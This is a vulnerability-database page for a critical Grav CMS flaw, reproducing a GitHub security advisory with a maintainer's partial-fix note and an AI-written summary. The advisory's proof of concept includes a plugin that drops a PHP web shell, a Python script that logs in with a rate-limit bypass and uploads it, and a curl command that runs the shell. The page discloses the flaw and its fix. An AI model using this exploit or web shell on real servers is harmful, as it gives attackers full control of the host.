PHP
CVE-2026-42607
CRITICAL
Severity by source
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
An authenticated user with administrative privileges can achieve Remote Code Execution (RCE) by uploading a specially crafted ZIP file through the "Direct Install" tool. While the system attempts to block direct .php file uploads, it fails to inspect the contents of uploaded ZIP archives. Once a malicious plugin is extracted, it can execute arbitrary PHP code or drop a persistent web shell on the server.
Details
The vulnerability exists in the handling of the directInstall task within the Admin plugin and the Grav Package Manager (GPM) core.
- Vulnerable Endpoints: /admin/tools/direct-install
- Vulnerable Logic: AdminController.php (lines 1247-1295) and Gpm.php (lines 214-285).
- Root Cause: The function Installer::install() (called in Gpm.php:291) extracts the contents of the ZIP file directly into the /user/
plugins/ or /user/themes/ directories without validating the file extensions or the content of the files inside the archive.
PoC
- Prepare the Malicious Plugin
Create a directory named shellplugin and add the following files:
shellplugin.php:
<?php
namespace Grav\Plugin;
use Grav\Common\Plugin;
class ShellpluginPlugin extends Plugin {
public static function getSubscribedEvents(): array {
return ['onPluginsInitialized' => ['onPluginsInitialized', 0]];
}
public function onPluginsInitialized(): void {
$shell_path = GRAV_ROOT . '/shell.php';
if (!file_exists($shell_path)) {
file_put_contents($shell_path, '<?php system($_GET["cmd"]); ?>');
}
}
}
(Also include a basic blueprints.yaml and shellplugin.yaml as per Grav standards).
- Create the ZIP Archive
`zip -r /tmp/shellplugin.zip shellplugin/`
3. Execute the Exploit Script
Run the following Python script to automate the login, nonce retrieval, and malicious upload process:
`import requests, re, json
s = requests.Session()
BASE_URL = 'http://127.0.0.1'1. Login and Bypass Rate Limit via X-Forwarded-For
r = s.get(f'{BASE_URL}/admin')
nonce = re.search(r'name="login-nonce" value="([^"]+)"', r.text).group(1)
r2 = s.post(f'{BASE_URL}/admin',
headers={'X-Forwarded-For': '10.0.0.3'},
data={'data[username]': 'admin', 'data[password]': 'admin_password_here', 'task': 'login', 'login-nonce': nonce},
allow_redirects=False)
redirect = json.loads(r2.text)['redirect']
s.get(redirect)
print(f"[+] Logged in successfully.")
2. Extract Admin Nonce from Tools Page
tools = s.get(f'{BASE_URL}/admin/tools/direct-install')
admin_nonce = re.search(r'admin-nonce.*?value="([a-f0-9]{32})"', tools.text).group(1)
print(f"[+] Retrieved Admin Nonce: {admin_nonce}")3. Upload and Execute
with open('/tmp/shellplugin.zip', 'rb') as f:
zip_data = f.read()
resp = s.post(f'{BASE_URL}/admin/tools/direct-install',
data={'task': 'directInstall', 'admin-nonce': admin_nonce},
files={'uploaded_file': ('shellplugin.zip', zip_data, 'application/zip')},
headers={'X-Forwarded-For': '10.0.0.3'}
)
if "installation" in resp.text.lower():
print("[+] Plugin installed successfully!")
# Trigger the shell
s.get(BASE_URL)
print(f"[+] RCE Check: {BASE_URL}/shell.php?cmd=id")`4. Verification
Access the dropped shell to confirm command execution: curl -s "http://127.0.0.1/shell.php?cmd=whoami"
<img width="2547" height="756" alt="resim (2)" src="https://github.com/user-attachments/assets/6a8c25f1-9a9d-469f-ab68-3c7007e446d4" />
<img width="898" height="89" alt="resim (3)" src="https://github.com/user-attachments/assets/ec097785-1196-47a4-b24e-82fcbf0f7520" />
Impact
- Vulnerability Type: Remote Code Execution (RCE) / Path Traversal (via extraction).
- Who is impacted: Any Grav installation where the Admin plugin is enabled and an attacker has gained administrative access (or an administrator is tricked into uploading a malicious ZIP).
- Severity: Critical. Although it requires admin privileges, the ability to gain full server control (system-level access) makes this a high-impact finding, especially in multi-user environments or via CSRF/Session hijacking.
Maintainer note - partial fix applied (2026-04-24)
Fixed in Grav core on the 2.0 branch: commit 5a12f9be8 - ships in 2.0.0-beta.2.
What changed (path layer): Installer::unZip now pre-validates every entry name before calling ZipArchive::extractTo, and aborts the install if any entry looks like a Zip Slip primitive - .. path segments, absolute paths (Unix /… or Windows C:\…/\…), or NUL bytes. A crafted ZIP can no longer write files outside the target user/plugins/<slug> or user/themes/<slug> directory.
Explicit scope limitation: the "well-formed but malicious plugin code" angle of the PoC - uploading a plugin whose own PHP is the payload - is not addressed by this change. directInstall is an administrator-only operation whose explicit purpose is to install arbitrary PHP; defending against it would require a plugin-signing or marketplace-allowlist feature, which is a separate roadmap item. Administrators should only install plugins from trusted sources. This is now explicitly documented in the commit note.
Files:
system/src/Grav/Common/GPM/Installer.php- newisSafeArchiveEntry()helper + pre-extract validation loop.tests/unit/Grav/Common/Security/ZipSlipSecurityTest.php- 21 cases covering Unix/Windows/URL-encoded traversal primitives and legitimate plugin names.
---
Acknowledgements
The issue was identified by Security Researcher Mustafa Murat Akgül.
---
AnalysisAI
Remote code execution in Grav CMS versions prior to 2.0.0-beta.2 allows authenticated administrators to deploy malicious PHP web shells by uploading crafted ZIP files through the Direct Install tool at /admin/tools/direct-install. The vulnerability combines insufficient ZIP archive content validation (Zip Slip primitive via path traversal) with the design-level acceptance of arbitrary plugin PHP code. Publicly available exploit code exists, demonstrating automated login, nonce extraction, malicious plugin upload, and persistent shell deployment. CVSS 9.1 (Critical) reflects network-accessible RCE with scope change, though exploitation requires high privileges (admin role). No EPSS or KEV data available at time of analysis.
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all
Same weakness CWE-94 – Code Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-w48r-jppp-rcfw